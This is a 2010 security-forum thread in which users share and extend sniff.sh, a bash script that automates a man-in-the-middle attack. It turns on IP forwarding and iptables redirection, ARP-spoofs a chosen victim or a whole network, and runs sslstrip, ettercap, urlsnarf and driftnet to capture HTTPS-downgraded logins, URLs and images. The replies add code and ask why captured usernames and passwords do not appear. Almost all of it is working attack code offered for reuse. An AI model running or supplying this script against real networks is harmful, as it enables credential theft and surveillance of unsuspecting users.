Tool I wrote sniff.sh

Printable View

Show 40 post(s) from this thread on one page

11-29-2010, 03:15 PM
ghero

Tool I wrote sniff.sh

Hello,

I wrote small script that uses sslstrip, arpspoof and ettercap for sniffing https ...
I got tired of typing these 3 commands all the time :)

Here is the script:

Code:

#!/bin/bash # Script for sniffing https connections. # Script uses Arpspoof, SSLStrip and Ettercap. # Tested on BT4 R2 # BY gHero # Ver 0.1 # ASCII sniff.sh echo ' .__ _____ _____ .__ ______ ____ |__|/ ____\/ ____\ _____| |__ / ___// \| \ __\\ __\ / ___/ | \ \___ \| | \ || | | | \___ \| Y \ /____ >___| /__||__| |__| /\/____ >___| / \/ \/ \/ \/ \/ ' echo '1' > /proc/sys/net/ipv4/ip_forward iptables --flush sleep 1 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 # Arpspoof echo echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0 echo '------------------------' echo -n -e '\E[37;41m'"Client IP address:"; tput sgr0 read IP1 echo -n -e '\E[30;47m'"Router's IP address:"; tput sgr0 read IP2 echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>:"; tput sgr0 read INT xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' & # SSLSTRIP xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' & # ETTERCAP xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

Version 0.2
# CodeName = cseven :)

Code:

#!/bin/bash # Script for sniffing https connections. # Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet. # Tested on BT4 R2 # BY gHero,cseven,spudgunman. # Ver 0.2 # ASCII sniff.sh echo ' .__ _____ _____ .__ ______ ____ |__|/ ____\/ ____\ _____| |__ / ___// \| \ __\\ __\ / ___/ | \ \___ \| | \ || | | | \___ \| Y \ /____ >___| /__||__| |__| /\/____ >___| / \/ \/ \/ \/ \/ ' echo '1' > /proc/sys/net/ipv4/ip_forward iptables --flush sleep 1 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 # Arpspoof echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? "; read ARPOP if [ "$ARPOP" == "T" ] ; then echo echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0 echo '------------------------' echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0 read IP1 echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0 read IP2 echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0 read INT xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' & else echo echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0 echo '------------------------' echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0 read IP2 echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0 read INT xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' & fi # SSLSTRIP xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' & # ETTERCAP xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' & # URLSNARF xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' & # DRIFTNET driftnet -p -i $INT &

Thanks Cseven and Spudgunman..

And here is video of script:
sniff.sh on Vimeo
11-29-2010, 10:42 PM
cseven

Re: sniff.sh

sometimes the simplest scripts are the best, anyone just learning can easily see what the commands are without having to dissect a more involved script.

Here's a simple addition for URLSNARF

Code:

# URLSNARF xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &
11-30-2010, 07:10 AM
VulcanX

Re: sniff.sh

Awesome Ghero excellent work, I will test it out at home fully :)

Im curious as to why you using xterm though? Sorry for my noobness Im trying my hand at sum scripting and its not simple at all :P
11-30-2010, 04:52 PM
christ044

Re: sniff.sh

VulcanX, this could be of use to you, found it when doing a little scriptting myself

bash commands - Linux MAN Pages
11-30-2010, 05:11 PM
Citruspers

Re: sniff.sh

Nice one. I'm still kind of a noob with bash scripting but this was pretty easy to follow.
11-30-2010, 08:50 PM
Archangel-Amael

Re: sniff.sh

Moved to experts section, and changed title.
12-01-2010, 12:37 AM
sLiPpErY

Re: Tool I wrote sniff.sh

Did you see my tool? http://www.backtrack-linux.org/forum...4x0r-tool.html it has this incorporated into it basically.. you can always add to it, if you do let me know so I can get it added, I'll add your name into it aswell.
12-01-2010, 01:59 AM
yeehawjared

Re: Tool I wrote sniff.sh

ascii art FTW. Now code it in python or perl :)
12-01-2010, 12:33 PM
VulcanX

Re: Tool I wrote sniff.sh

From previous MITM attacks I have done the username/password appeared on the screen. Here I cannot trace it?
I even tried to check the ssl_log.txt and thats only the SSL certificate info. Am I missing something?
12-05-2010, 01:03 AM
cseven

Re: Tool I wrote sniff.sh

Added option to ARP a Target or Network:

Replace #Arpsoof section with:

Code:

# Arpspoof echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? "; read ARPOP if [ "$ARPOP" == "T" ] ; then echo echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0 echo '------------------------' echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0 read IP1 echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0 read IP2 echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0 read INT xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' & else echo echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0 echo '------------------------' echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0 read IP2 echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0 read INT xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' & fi

Show 40 post(s) from this thread on one page